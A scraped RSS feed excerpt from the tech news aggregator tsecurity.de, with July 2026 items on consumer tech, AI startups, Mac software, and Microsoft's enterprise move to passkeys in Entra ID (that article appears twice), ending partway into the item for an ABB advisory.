<guid isPermaLink="true">https://tsecurity.de/de/3671334/it-nachrichten/steam-fan-finds-cheap-ssds-to-make-retro-game-cartridges-system-the-only-problem-is-2026-is-the-worst-year-in-history-to-do-it/</guid>
<pubDate>Wed, 15 Jul 2026 18:33:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PC physical copies could be a thing again, after this Steam gamer found a unique but expensive way to do it.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nostalgic Bondi Blue iMac G3 Could Become An Official LEGO Set]]></title>
<description><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under revi...]]></description>
<link>https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under review by the manufacturer.



If everything falls into place, you might soon be able to build a physical piece of computer history right on your desk.



The fan design features clear blue bricks and internal details



The proposed set comes from a creator named terauma on the official Ideas platform. This builder used exactly 700 pieces to recreate the famous desktop computer in stunning accuracy. The model perfectly captures the original retro aesthetic by using see through blue parts for the distinctive outer shell.



When you look closer, the attention to detail becomes even more obvious. The builder thoughtfully included small versions of the internal circuit boards and the heavy cathode ray tube monitor inside the casing. The whole package also features matching desktop accessories. Builders get to piece together the famous round hockey puck mouse and the classic keyboard with clear cables. It is a perfect tribute to the original Mac that helped reshape the personal computing market.



The final approval completely depends on passing strict licensing hurdles



The project recently reached a major milestone by gathering 10,000 votes from community supporters. This huge number means the toy company must formally review the idea for mass production. Currently, the set is sitting in a special parking lot status. This simply means the review board needs extra time to make a final decision, which is actually a very positive sign instead of an instant rejection.



The biggest challenge now is getting official permission from Apple to sell a branded product. The hardware maker is famously strict about its intellectual property and rarely approves third party merchandise. A previous fan project for a brick built retail store was quickly denied.



However, the extended review time suggests the two companies might be actively talking. If the tech brand decides to embrace its own history, this colorful kit could become a massive hit for vintage computer fans everywhere.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Apple FaceID Co-Inventor Building a Frontier AI Model for the Human Brain]]></title>
<description><![CDATA[Gidi Littwin's new AI startup, Hemispheric, makes diagnostic brain scans for conditions like depression, PTSD, and Parkinson’s. He wants the technology to be as cheap and easy as a blood test.]]></description>
<link>https://tsecurity.de/de/3670598/it-nachrichten/the-apple-faceid-co-inventor-building-a-frontier-ai-model-for-the-human-brain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670598/it-nachrichten/the-apple-faceid-co-inventor-building-a-frontier-ai-model-for-the-human-brain/</guid>
<pubDate>Wed, 15 Jul 2026 14:18:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gidi Littwin's new AI startup, Hemispheric, makes diagnostic brain scans for conditions like depression, PTSD, and Parkinson’s. He wants the technology to be as cheap and easy as a blood test.]]></content:encoded>
</item>
<item>
<title><![CDATA[MacWhisper 14 brings a fresh text editor and major speed boosts]]></title>
<description><![CDATA[The popular AI transcription app for Apple computers just got a big update. MacWhisper 14 is now available, bringing a fresh design and noticeable speed boosts to the tool. Independent developer Jordi Bruin rolled out this major release to help users turn audio into text faster. It still uses loc...]]></description>
<link>https://tsecurity.de/de/3670271/ios-mac-os/macwhisper-14-brings-a-fresh-text-editor-and-major-speed-boosts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670271/ios-mac-os/macwhisper-14-brings-a-fresh-text-editor-and-major-speed-boosts/</guid>
<pubDate>Wed, 15 Jul 2026 12:10:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The popular AI transcription app for Apple computers just got a big update. MacWhisper 14 is now available, bringing a fresh design and noticeable speed boosts to the tool. Independent developer Jordi Bruin rolled out this major release to help users turn audio into text faster. It still uses local artificial intelligence models to keep your data private, but now it handles daily tasks much better than before.



The new update revamps the main text editing screen



Version 14 introduces a brand new Editor View that lets you edit text directly on the main screen. You can add paragraphs, assign different speakers, and mark your favorite parts of a transcript without jumping through menus.



The developer also released version 14.1 shortly after to fix early bugs. This minor update added Gladia as a cloud provider, letting people use their own API keys for transcription. The app continues to support popular models like OpenAI Whisper and Nvidia Parakeet right on your Mac.



Performance improvements make the application run faster and smoother



This release brings major speed improvements across the entire application. Whether you are working on an old MacBook or a newer machine, the app feels lighter and more responsive. 



MacWhisper 14 also includes:




A redesigned AI services screen that is clearer and easier to read



Updated AI models for popular transcription providers



Better playback when working with multiple open transcripts



Improved transcript windows with better keyboard shortcut behavior



Deepgram updates including region selection and filler word controls



Cloud transcription uploads that no longer load entire files into memory



Fixes for menu bar position, CPU usage, and audio syncing issues




MacWhisper Pro users get this update at no extra cost, and the developer is currently offering a 14 percent discount for new buyers looking to upgrade.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple and PrismML Officially Explore New Tech to Shrink iPhone AI Models]]></title>
<description><![CDATA[A new startup recently caught the attention of Apple as it looks for fresh ways to bring better technology directly to your pocket. Just days after early reports surfaced online, PrismML confirmed that it is actively talking with the smartphone maker about its new software compression tools.



T...]]></description>
<link>https://tsecurity.de/de/3670269/ios-mac-os/apple-and-prismml-officially-explore-new-tech-to-shrink-iphone-ai-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670269/ios-mac-os/apple-and-prismml-officially-explore-new-tech-to-shrink-iphone-ai-models/</guid>
<pubDate>Wed, 15 Jul 2026 12:10:03 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new startup recently caught the attention of Apple as it looks for fresh ways to bring better technology directly to your pocket. Just days after early reports surfaced online, PrismML confirmed that it is actively talking with the smartphone maker about its new software compression tools.



The startup built a clever method to squeeze massive artificial intelligence models down to a fraction of their normal size. This breakthrough could let high-end programs run locally on standard phones without destroying battery life.



The startup squeezes massive software models to fit inside phones



PrismML CEO Babak Hassibi shared in a recent interview that Apple is currently evaluating its new technology. He noted that talks are in the early stages but progressing nicely. The main problem with modern AI is that the best programs require huge amounts of memory and computing power. Normally, these models live on massive cloud servers because normal computers and phones simply cannot handle them alone.



PrismML claims it can reduce a 54-gigabyte model down to just under four gigabytes. It does this by aggressively reducing the memory values used by the underlying code. This massive drop in size means a device like the iPhone 15 Pro could run the software entirely on its own built-in memory.



The startup did admit that the compressed version loses a tiny bit of performance compared to the full-size model, especially when handling complex math or coding problems.



Running tasks locally on devices keeps user data highly private



Keeping things local instead of relying on cloud servers is a major priority right now. Recent news that Apple met with a startup to squeeze massive AI models onto iPhone lines up perfectly with its long-term hardware plans. By running tasks directly on the device, the company can protect user privacy since data never leaves the phone. It also means people would not need a constant internet connection just to use basic smart features.



If this technology works at scale, it could change the current hardware rush. Right now, companies are spending billions to build giant data centers just to process user requests. If phones can handle the heavy lifting themselves, it lowers the demand for expensive server chips and cloud infrastructure.



Apple and PrismML might agree on a licensing deal, or the tech giant could simply decide to buy the startup outright. The ability to run full-sized models locally could give Siri a massive intelligence boost without compromising user privacy or requiring expensive cloud processing fees.]]></content:encoded>
</item>
<item>
<title><![CDATA[Brydge Expands ProDock Family With Three New Vertical Docking Stations]]></title>
<description><![CDATA[Brydge just dropped some fresh hardware for anyone looking to organize a messy desk. The accessory maker added three new vertical docking stations to its lineup to give users more options to connect their computers to external monitors and accessories. The brand new ProDock Solo, ProDock Duo, and...]]></description>
<link>https://tsecurity.de/de/3670268/ios-mac-os/brydge-expands-prodock-family-with-three-new-vertical-docking-stations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670268/ios-mac-os/brydge-expands-prodock-family-with-three-new-vertical-docking-stations/</guid>
<pubDate>Wed, 15 Jul 2026 12:10:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Brydge just dropped some fresh hardware for anyone looking to organize a messy desk. The accessory maker added three new vertical docking stations to its lineup to give users more options to connect their computers to external monitors and accessories. The brand new ProDock Solo, ProDock Duo, and ProDock Trio are built to keep your laptop standing upright while massively expanding its connectivity without taking up much room.



Three different choices offer varying power and display support



The entry-level ProDock Solo costs $229 and connects via standard USB-C. It delivers 90 watts of charging power and supports a single 4K display. It features seven extra ports, making it perfect for basic setups. If you need more speed, the $399 ProDock Duo uses Thunderbolt 4 technology. It bumps the connectivity up to 10 ports while supporting dual 4K monitors and keeping the same 90-watt charging speed.



The highest tier option is the $459 ProDock Trio. This powerhouse features a massive 80 gigabits per second connection and supports three 4K displays at a super smooth 144Hz refresh rate. It delivers up to 140 watts of charging power and includes 11 ports to handle almost any accessory you want to plug in.



The docks are built specifically for modern Apple laptops



These new stations are designed to perfectly fit recent Apple machines. Both the Solo and the Duo work well with the MacBook Pro and MacBook Air. The massive ProDock Trio is built exclusively for the more demanding MacBook Pro lineup. Each dock features a sleek aluminum body that naturally blends in with the exact look of a modern Mac.



The vertical design does more than just look good on a desk. By holding the laptop straight up, the dock saves a massive amount of physical space in your work area. You can leave all your messy cables plugged directly into the back of the station at all times. When you sit down, you simply slide the computer down into the sleeve to instantly connect to your entire desktop setup.]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: OSINT VM 2026.5]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  Trace Labs has announced the release of OSINT VM 2026.5, the latest version of the project's Debian-based distribution with specialist open-source intelligence (OSINT) tools to help find missing persons and reunite them with their ...]]></description>
<link>https://tsecurity.de/de/3670184/unix-server/distribution-release-osint-vm-20265/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670184/unix-server/distribution-release-osint-vm-20265/</guid>
<pubDate>Wed, 15 Jul 2026 11:46:36 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  Trace Labs has announced the release of OSINT VM 2026.5, the latest version of the project's Debian-based distribution with specialist open-source intelligence (OSINT) tools to help find missing persons and reunite them with their families, designed exclusively to run on virtual machines. Unlike the previous release, which were....]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft is forcing an enterprise transition to passkeys]]></title>
<description><![CDATA[Passkeys have been around for some time, but enterprise-wide adoption to this point has been slow for a number of reasons. But soon, many Microsoft customers won’t have a choice.



Starting September 1, Microsoft will roll out passkeys as the default authentication method in its cloud-based iden...]]></description>
<link>https://tsecurity.de/de/3669425/it-nachrichten/microsoft-is-forcing-an-enterprise-transition-to-passkeys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669425/it-nachrichten/microsoft-is-forcing-an-enterprise-transition-to-passkeys/</guid>
<pubDate>Wed, 15 Jul 2026 04:32:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Passkeys have been around for some time, but enterprise-wide adoption to this point has been slow for a number of reasons. But soon, many Microsoft customers won’t have a choice.</p>



<p class="wp-block-paragraph">Starting September 1, Microsoft will roll out passkeys as the default authentication method in its cloud-based identity and access management (IAM) service Entra ID. And following a transition period, Microsoft-provided SMS and voice authentication will officially end on February 1, 2027.</p>



<p class="wp-block-paragraph">With this move, Microsoft seems to be underlining the urgent need for a more secure authentication standard, as attackers up their game with AI.</p>



<p class="wp-block-paragraph">This is an “important milestone,” because it moves passwordless authentication from an optional security enhancement to the expected standard, noted <a href="https://www.sans.org/profiles/ensar-seker" target="_blank" rel="noreferrer noopener">Ensar Seker</a>, CISO at SOCRadar. “That shift is significant as attackers increasingly rely on AI to automate phishing campaigns, generate convincing login pages, and conduct large-scale credential theft.”</p>



<h2 class="wp-block-heading">Microsoft’s six-month passkey roll-out</h2>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4009132/passkeys-how-they-work-how-to-use-them.html" target="_blank">Passkeys</a> require users to authenticate via a fingerprint, facial scan, or lock screen mechanism, rather than a password. They can be stored on physical USB keys (like YubiKey), or as digital credentials on computers, phones, or in cloud accounts.</p>



<p class="wp-block-paragraph">This method, Microsoft contended, reduces reliance on phishable authentication tools like SMS and voice, and hardens protection against credential theft.</p>



<p class="wp-block-paragraph">Passkeys “work better for users and worse for cyberattackers,” <a href="https://www.linkedin.com/in/nadim-abdo/" target="_blank" rel="noreferrer noopener">Nadim Abdo</a>, Microsoft corporate VP for identity and network access engineering, wrote in a <a href="https://www.microsoft.com/en-us/security/blog/2026/07/13/microsoft-entra-id-security-updates-passkeys-are-the-default-authentication-method-in-entra-id/" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p class="wp-block-paragraph">Microsoft’s announced timeline for rolling out passkeys is relatively aggressive:</p>



<ul class="wp-block-list">
<li><strong>September 1, 2026</strong>: All SMS or voice-enabled users will be “auto-enabled and nudged” to register a passkey upon multifactor authentication (MFA) sign-in.</li>



<li><strong>September 18, 2026</strong>: Pricing, commercial terms, and a list of supported telecom providers will be shared for scenarios that still require SMS or voice authentication due to regulation or technical or operational challenges.</li>



<li><strong>October 30, 2026</strong>: Enterprises still using SMS and voice must select and configure a supported telecom provider through the Microsoft Security Store. From then on, they will be responsible for any telecom-related costs.</li>



<li><strong>February 1, 2027</strong>: Microsoft-provided telecom delivery for SMS and voice authentication ends as a native Microsoft Entra capability.</li>
</ul>



<p class="wp-block-paragraph">After February 1, enterprises that require SMS or voice for MFA must register a passkey before sign-in. There will be no opt-out option.</p>



<p class="wp-block-paragraph">It’s important to note that these dates apply to public cloud-hosted Entra ID. Support for other cloud environments will follow a separate timeline; additional guidance and dates are to come.</p>



<p class="wp-block-paragraph">While SMS and voice have served their purpose well, Abdo said, bringing MFA to billions of users who otherwise would have had none, the threat environment has changed in “speed, scale, and sophistication,” necessitating this move to passkeys.</p>



<h2 class="wp-block-heading">The benefits of passkeys</h2>



<p class="wp-block-paragraph">SOCRadar’s Seker pointed out that passkeys fundamentally change the attack surface because, unlike with passwords, there is no transmission of shared secrets that can be stolen by threat actors. Authentication requires possession of the user’s device, along with biometric verification or a PIN.</p>



<p class="wp-block-paragraph">“Even highly convincing AI-generated phishing pages cannot simply trick users into handing over a passkey the way they can with passwords or one-time codes,” he said.</p>



<p class="wp-block-paragraph">So why haven’t we seen widespread enterprise adoption? Identity ecosystems are “fragmented,” Seker noted, and many enterprises still rely on legacy applications that only support passwords. They also struggle with cross-platform compatibility, lifecycle management, recovery processes, shared accounts, and employee onboarding and offboarding.</p>



<p class="wp-block-paragraph">Further, “until recently, many organizations viewed passkeys as a consumer technology rather than an enterprise identity strategy,” he said.</p>



<p class="wp-block-paragraph">Microsoft’s move changes that equation, because Entra sits at the center of many organizations’ identity infrastructure, Seker noted. Default settings are typically the strongest drivers of security adoption, so when passwordless authentication becomes required rather than optional, organizations are far more likely to deploy it at scale.</p>



<p class="wp-block-paragraph">Its biggest benefit would be a “dramatic reduction” in credential-based attacks, Seker said. He pointed out that most successful compromises still begin with stolen credentials obtained through phishing, infostealer malware, password reuse, or adversary-in-the-middle attacks. Passkeys “eliminate or significantly reduce” many of those attack paths, while reducing password fatigue and the help desk costs related to password resets.</p>



<p class="wp-block-paragraph">In addition, rather than trying to continuously improve users’ ability to detect increasingly sophisticated phishing attempts, passkeys remove the credential from the equation altogether, Seker noted. “That represents a more sustainable long-term security strategy than relying solely on user awareness training.”</p>



<p class="wp-block-paragraph">Still, passkeys are not a silver bullet, as they do not stop endpoint compromise, session token theft, malicious insiders, or attackers who already have control of a trusted device. Enterprises must complement passkeys with endpoint protection, continuous monitoring, conditional access policies, and identity threat detection, Seker advised.</p>



<h2 class="wp-block-heading">How enterprises can prepare</h2>



<p class="wp-block-paragraph">To prepare for the shift to passkeys, Microsoft advised enterprises to review their authentication policy and identify the groups still using SMS or voice authentication. They should then select the best authentication method for user devices and workflows, and ensure all employees are given passkeys and security keys.</p>



<p class="wp-block-paragraph">Entra ID supports both synced passkeys (those stored in platform credential managers like iCloud Keychain and Google Password Manager), and device-bound passkeys such as Microsoft Authenticator passkeys, Entra passkey on Windows, or FIDO2 security keys.</p>



<p class="wp-block-paragraph">Seker advised enterprises to evaluate support for FIDO2 and passkeys across their identity infrastructure, and to develop clear enrollment and recovery procedures. They should also educate users on what’s changing, how passkeys work, and how they can complete registration. Further, Seker said, it’s important to establish secure device management practices and to continue enforcing least privilege, conditional access, and risk-based authentication policies throughout the transition.</p>



<p class="wp-block-paragraph">Ultimately, he pointed out, the move is crucial. “Over the next several years, organizations that continue relying primarily on passwords will likely face higher operational risk as AI continues to lower the cost and increase the effectiveness of credential-based attacks,” he said.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft is forcing an enterprise transition to passkeys]]></title>
<description><![CDATA[Passkeys have been around for some time, but enterprise-wide adoption to this point has been slow for a number of reasons. But soon, many Microsoft customers won’t have a choice.



Starting September 1, Microsoft will roll out passkeys as the default authentication method in its cloud-based iden...]]></description>
<link>https://tsecurity.de/de/3669414/it-security-nachrichten/microsoft-is-forcing-an-enterprise-transition-to-passkeys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669414/it-security-nachrichten/microsoft-is-forcing-an-enterprise-transition-to-passkeys/</guid>
<pubDate>Wed, 15 Jul 2026 04:20:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Passkeys have been around for some time, but enterprise-wide adoption to this point has been slow for a number of reasons. But soon, many Microsoft customers won’t have a choice.</p>



<p class="wp-block-paragraph">Starting September 1, Microsoft will roll out passkeys as the default authentication method in its cloud-based identity and access management (IAM) service Entra ID. And following a transition period, Microsoft-provided SMS and voice authentication will officially end on February 1, 2027.</p>



<p class="wp-block-paragraph">With this move, Microsoft seems to be underlining the urgent need for a more secure authentication standard, as attackers up their game with AI.</p>



<p class="wp-block-paragraph">This is an “important milestone,” because it moves passwordless authentication from an optional security enhancement to the expected standard, noted <a href="https://www.sans.org/profiles/ensar-seker" target="_blank" rel="noreferrer noopener">Ensar Seker</a>, CISO at SOCRadar. “That shift is significant as attackers increasingly rely on AI to automate phishing campaigns, generate convincing login pages, and conduct large-scale credential theft.”</p>



<h2 class="wp-block-heading">Microsoft’s six-month passkey roll-out</h2>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4009132/passkeys-how-they-work-how-to-use-them.html" target="_blank">Passkeys</a> require users to authenticate via a fingerprint, facial scan, or lock screen mechanism, rather than a password. They can be stored on physical USB keys (like YubiKey), or as digital credentials on computers, phones, or in cloud accounts.</p>



<p class="wp-block-paragraph">This method, Microsoft contended, reduces reliance on phishable authentication tools like SMS and voice, and hardens protection against credential theft.</p>



<p class="wp-block-paragraph">Passkeys “work better for users and worse for cyberattackers,” <a href="https://www.linkedin.com/in/nadim-abdo/" target="_blank" rel="noreferrer noopener">Nadim Abdo</a>, Microsoft corporate VP for identity and network access engineering, wrote in a <a href="https://www.microsoft.com/en-us/security/blog/2026/07/13/microsoft-entra-id-security-updates-passkeys-are-the-default-authentication-method-in-entra-id/" target="_blank" rel="noreferrer noopener">blog post</a>.</p>



<p class="wp-block-paragraph">Microsoft’s announced timeline for rolling out passkeys is relatively aggressive:</p>



<ul class="wp-block-list">
<li><strong>September 1, 2026</strong>: All SMS or voice-enabled users will be “auto-enabled and nudged” to register a passkey upon multifactor authentication (MFA) sign-in.</li>



<li><strong>September 18, 2026</strong>: Pricing, commercial terms, and a list of supported telecom providers will be shared for scenarios that still require SMS or voice authentication due to regulation or technical or operational challenges.</li>



<li><strong>October 30, 2026</strong>: Enterprises still using SMS and voice must select and configure a supported telecom provider through the Microsoft Security Store. From then on, they will be responsible for any telecom-related costs.</li>



<li><strong>February 1, 2027</strong>: Microsoft-provided telecom delivery for SMS and voice authentication ends as a native Microsoft Entra capability.</li>
</ul>



<p class="wp-block-paragraph">After February 1, enterprises that require SMS or voice for MFA must register a passkey before sign-in. There will be no opt-out option.</p>



<p class="wp-block-paragraph">It’s important to note that these dates apply to public cloud-hosted Entra ID. Support for other cloud environments will follow a separate timeline; additional guidance and dates are to come.</p>



<p class="wp-block-paragraph">While SMS and voice have served their purpose well, Abdo said, bringing MFA to billions of users who otherwise would have had none, the threat environment has changed in “speed, scale, and sophistication,” necessitating this move to passkeys.</p>



<h2 class="wp-block-heading">The benefits of passkeys</h2>



<p class="wp-block-paragraph">SOCRadar’s Seker pointed out that passkeys fundamentally change the attack surface because, unlike with passwords, there is no transmission of shared secrets that can be stolen by threat actors. Authentication requires possession of the user’s device, along with biometric verification or a PIN.</p>



<p class="wp-block-paragraph">“Even highly convincing AI-generated phishing pages cannot simply trick users into handing over a passkey the way they can with passwords or one-time codes,” he said.</p>



<p class="wp-block-paragraph">So why haven’t we seen widespread enterprise adoption? Identity ecosystems are “fragmented,” Seker noted, and many enterprises still rely on legacy applications that only support passwords. They also struggle with cross-platform compatibility, lifecycle management, recovery processes, shared accounts, and employee onboarding and offboarding.</p>



<p class="wp-block-paragraph">Further, “until recently, many organizations viewed passkeys as a consumer technology rather than an enterprise identity strategy,” he said.</p>



<p class="wp-block-paragraph">Microsoft’s move changes that equation, because Entra sits at the center of many organizations’ identity infrastructure, Seker noted. Default settings are typically the strongest drivers of security adoption, so when passwordless authentication becomes required rather than optional, organizations are far more likely to deploy it at scale.</p>



<p class="wp-block-paragraph">Its biggest benefit would be a “dramatic reduction” in credential-based attacks, Seker said. He pointed out that most successful compromises still begin with stolen credentials obtained through phishing, infostealer malware, password reuse, or adversary-in-the-middle attacks. Passkeys “eliminate or significantly reduce” many of those attack paths, while reducing password fatigue and the help desk costs related to password resets.</p>



<p class="wp-block-paragraph">In addition, rather than trying to continuously improve users’ ability to detect increasingly sophisticated phishing attempts, passkeys remove the credential from the equation altogether, Seker noted. “That represents a more sustainable long-term security strategy than relying solely on user awareness training.”</p>



<p class="wp-block-paragraph">Still, passkeys are not a silver bullet, as they do not stop endpoint compromise, session token theft, malicious insiders, or attackers who already have control of a trusted device. Enterprises must complement passkeys with endpoint protection, continuous monitoring, conditional access policies, and identity threat detection, Seker advised.</p>



<h2 class="wp-block-heading">How enterprises can prepare</h2>



<p class="wp-block-paragraph">To prepare for the shift to passkeys, Microsoft advised enterprises to review their authentication policy and identify the groups still using SMS or voice authentication. They should then select the best authentication method for user devices and workflows, and ensure all employees are given passkeys and security keys.</p>



<p class="wp-block-paragraph">Entra ID supports both synced passkeys (those stored in platform credential managers like iCloud Keychain and Google Password Manager), and device-bound passkeys such as Microsoft Authenticator passkeys, Entra passkey on Windows, or FIDO2 security keys.</p>



<p class="wp-block-paragraph">Seker advised enterprises to evaluate support for FIDO2 and passkeys across their identity infrastructure, and to develop clear enrollment and recovery procedures. They should also educate users on what’s changing, how passkeys work, and how they can complete registration. Further, Seker said, it’s important to establish secure device management practices and to continue enforcing least privilege, conditional access, and risk-based authentication policies throughout the transition.</p>



<p class="wp-block-paragraph">Ultimately, he pointed out, the move is crucial. “Over the next several years, organizations that continue relying primarily on passwords will likely face higher operational risk as AI continues to lower the cost and increase the effectiveness of credential-based attacks,” he said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.computerworld.com/article/4197029/microsoft-is-forcing-an-enterprise-transition-to-passkeys.html" target="_blank">Computerworld</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Cheap Web Hosting Services – Guide – AddictiveTips 2026]]></title>
<description><![CDATA[If you are looking for cheap web hosting without compromising on quality, you’re in the right place. Finding the best cheap web hosting services for your business is easy once you know what to look for. When picking the cheapest option, you want to ensure that the service itself is not cheap and ...]]></description>
<link>https://tsecurity.de/de/3669382/betriebssysteme/best-cheap-web-hosting-services-guide-addictivetips-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669382/betriebssysteme/best-cheap-web-hosting-services-guide-addictivetips-2026/</guid>
<pubDate>Wed, 15 Jul 2026 03:54:10 +0200</pubDate>
<category>🖥️  Betriebssysteme</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you are looking for cheap web hosting without compromising on quality, you’re in the right place. Finding the best cheap web hosting services for your business is easy once you know what to look for. When picking the cheapest option, you want to ensure that the service itself is not cheap and guarantees reliable […]</p>
<p>The post <a rel="nofollow" href="https://www.addictivetips.com/hosting/best-cheap-hosting-services/">Best Cheap Web Hosting Services – Guide – AddictiveTips 2026</a> appeared first on <a rel="nofollow" href="https://www.addictivetips.com/">AddictiveTips</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Back-to-School Tech Isn't Cheap. These Student Discounts Can Help]]></title>
<description><![CDATA[Amazon and Walmart have student offers to help you save on subscriptions and essentials year-round.]]></description>
<link>https://tsecurity.de/de/3669361/it-nachrichten/back-to-school-tech-isnt-cheap-these-student-discounts-can-help/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669361/it-nachrichten/back-to-school-tech-isnt-cheap-these-student-discounts-can-help/</guid>
<pubDate>Wed, 15 Jul 2026 03:17:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon and Walmart have student offers to help you save on subscriptions and essentials year-round.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows-Tool zum Entfernen bösartiger Software Version 5.143 ist verfügbar - it-blogger.net]]></title>
<description><![CDATA[Du solltest daher ein Antivirenprodukt verwenden, um zum Schutz deines Computers mit Windows 7, Windows Server 2008, Windows 8.1, Windows Server 2012 ...]]></description>
<link>https://tsecurity.de/de/3669060/windows-server/windows-tool-zum-entfernen-boesartiger-software-version-5143-ist-verfuegbar-it-bloggernet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669060/windows-server/windows-tool-zum-entfernen-boesartiger-software-version-5143-ist-verfuegbar-it-bloggernet/</guid>
<pubDate>Tue, 14 Jul 2026 22:16:00 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Du solltest daher ein Antivirenprodukt verwenden, um zum Schutz deines Computers mit Windows 7, <b>Windows Server</b> 2008, Windows 8.1, <b>Windows Server</b> 2012 ...]]></content:encoded>
</item>
<item>
<title><![CDATA[PrismML confirms it is in talks with Apple about AI model-shrinking tech]]></title>
<description><![CDATA[Five days after initial reports that there was an AI-model shrinking technology by PrismML suitable for iPhones, the company has confirmed it is talking to Apple over the use of its technology.Siri at work on an iPhoneOne of the major problems with AI processing is the need to manage massive mode...]]></description>
<link>https://tsecurity.de/de/3668803/ios-mac-os/prismml-confirms-it-is-in-talks-with-apple-about-ai-model-shrinking-tech/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668803/ios-mac-os/prismml-confirms-it-is-in-talks-with-apple-about-ai-model-shrinking-tech/</guid>
<pubDate>Tue, 14 Jul 2026 19:35:20 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Five days after initial reports that there was an AI-model shrinking technology by PrismML suitable for iPhones, the company has confirmed it is talking to Apple over the use of its technology.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68246-143874-67944-143237-000-lead-Siri-AI-subscription-xl-xl.jpg" alt="Smartphone screen showing Siri AI conversation about Apple subscription costs, with text explaining core features remain free but some advanced functions may require paid iCloud or future premium tiers" height="720"><br><span>Siri at work on an iPhone</span></div><br>One of the major problems with AI processing is the need to manage massive models that most normal computers and smartphones cannot easily handle alone. On July 9, the start-up <a href="https://appleinsider.com/articles/26/07/09/new-ai-startup-could-shrink-server-sized-models-for-use-on-iphones">PrismML surfaced</a> with a solution to shrink down the models to a more manageable size.<br><br>A few days later, on July 14, the startup confirmed the talks were underway. <a href="https://www.cnbc.com/2026/07/14/apple-prismml-ai-compression-iphone.html">Speaking to</a> <em>CNBC</em>, startup CEO Babak Hassibi said that Apple and other companies are evaluating its models.<br><br><br> <a href="https://appleinsider.com/articles/26/07/14/prismml-confirms-it-is-in-talks-with-apple-about-ai-model-shrinking-tech?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244956?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[ABB Advant Master Online Builder]]></title>
<description><![CDATA[View CSAF
Summary
ABB became aware of vulnerability in the products versions listed as affected in the advisory, where an incorrect version of Online Builder (ONB) was included in the media. An update is available that resolves the vulnerability, see details in Recommended immediate actions.
The ...]]></description>
